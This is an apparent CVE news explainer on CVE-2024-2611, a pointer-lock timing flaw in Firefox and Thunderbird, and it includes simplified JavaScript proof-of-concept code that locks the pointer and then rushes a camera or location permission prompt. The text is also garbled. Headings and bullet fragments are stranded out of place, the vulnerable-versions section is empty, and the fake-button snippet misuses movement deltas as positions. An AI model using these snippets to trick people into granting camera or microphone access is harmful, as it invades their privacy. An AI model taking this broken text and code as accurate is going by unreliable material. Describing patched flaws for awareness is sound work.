CVE CyberSecurity Database News

CVE-2024-2611 - Pointer Lock Race — How a Missing Delay Tricked Users in Firefox and Thunderbird

Poster -

In early 2024, a critical vulnerability was discovered and patched in Firefox (before version 124), Firefox ESR (before 115.9), and Thunderbird (before 115.9). Known as CVE-2024-2611, this bug involved a missing delay in the way browsers handle pointer lock, presenting an opportunity for malicious websites to hijack user actions and trick them into granting dangerous permissions. In this long read, we'll break down how the bug worked, how attackers could exploit it, and what you should do to stay safe.

What is Pointer Lock?

Pointer lock is a feature that lets websites hide the mouse cursor and track mouse movement exactly, commonly used in games and web apps that need immersive mouse controls. Normally, the browser shows a permission prompt asking the user if they're okay with the page getting this much control over their mouse.

The Bug: Missing Delay

Browsers are smart—when a site asks for pointer lock, they delay permission dialogs or block them if suspicious actions are detected. The idea is to stop tricking users with sudden pop-ups. But with CVE-2024-2611, Firefox and Thunderbird were missing a small but critical delay when granting pointer lock permissions.

Take over the cursor

- Immediately show a permission prompt (say, for camera/mic access)

Exploit Scenario: How an Attacker Can Trick You

Let’s see how a web page could exploit CVE-2024-2611 in the wild. Note: The following is a simplified and ethical demonstration, only for educational awareness.

Step 1: Lock the Pointer

The attacker sets up a page that requests pointer lock.

// Step 1: Ask for pointer lock
document.body.requestPointerLock();

Step 2: Instantly Trigger a Permission Prompt

Right after the pointer is locked, the attacker triggers a camera or location permission.

// Step 2: Trigger a permission prompt
navigator.geolocation.getCurrentPosition(() => {}, () => {}, {timeout: 100});

Normally the browser waits—a necessary delay to keep you safe. In affected Firefox versions, that delay wasn’t there!

Create a convincing fake UI overlay

When the real permission prompt appears, your cursor is no longer under your control, and you might click "Allow" thinking you’re doing something else.

Here’s a hypothetical snippet that moves a fake button under the cursor

document.addEventListener('mousemove', function(e) {
  fakeButton.style.left = e.movementX + 'px';
  fakeButton.style.top  = e.movementY + 'px';
});

Here’s a simplified exploit demo

<button id="start">Start Trick</button>
<script>
document.getElementById('start').onclick = function() {
    document.body.requestPointerLock();
    setTimeout(() => {
        // Quickly ask for camera after pointer lock!
        navigator.mediaDevices.getUserMedia({video:true})
            .then(stream => {})
            .catch(e => {});
    }, 10); // No delay, so it's instant!
};
</script>

On vulnerable browsers, if the user clicked “Start Trick,” their cursor would lock; the camera permission dialog would appear almost instantly, with no visual clue that their click might end up in the system permission dialog.

Make you grant serious permissions (camera, microphone) without realizing it

This sort of UI misdirection is a classic phishing or "clickjacking" technique, and the missing delay made it a breeze.

Which Versions Are Vulnerable?

According to Mozilla’s official advisory (MFSA 2024-13):

How Was It Fixed?

Mozilla developers added a stricter delay, ensuring system permission dialogs cannot appear instantly after pointer lock is granted. This makes it much harder for attackers to sync fake UI with real permission prompts.

References

- Mozilla Security Advisory: MFSA 2024-13
- NIST Vulnerability Detail - CVE-2024-2611
- Pointer Lock API - MDN Web Docs

What Should You Do?

- Update Now: If you use Firefox or Thunderbird, upgrade to at least Firefox 124, Firefox ESR 115.9, or Thunderbird 115.9.
- Be Cautious: Always read permission prompts carefully—don’t click “Allow” in a hurry, especially on unfamiliar pages.

Conclusion

CVE-2024-2611 is a classic example of how timing and UI handling bugs can turn a harmless feature into a dangerous exploit. Remember: even small delays matter when it comes to user safety. Make sure your browser is up-to-date so you’re protected from these clever tricks!


Stay safe, and as always, keep your software current.

Timeline

Published on: 03/19/2024 12:15:09 UTC
Last modified on: 10/30/2024 19:35:10 UTC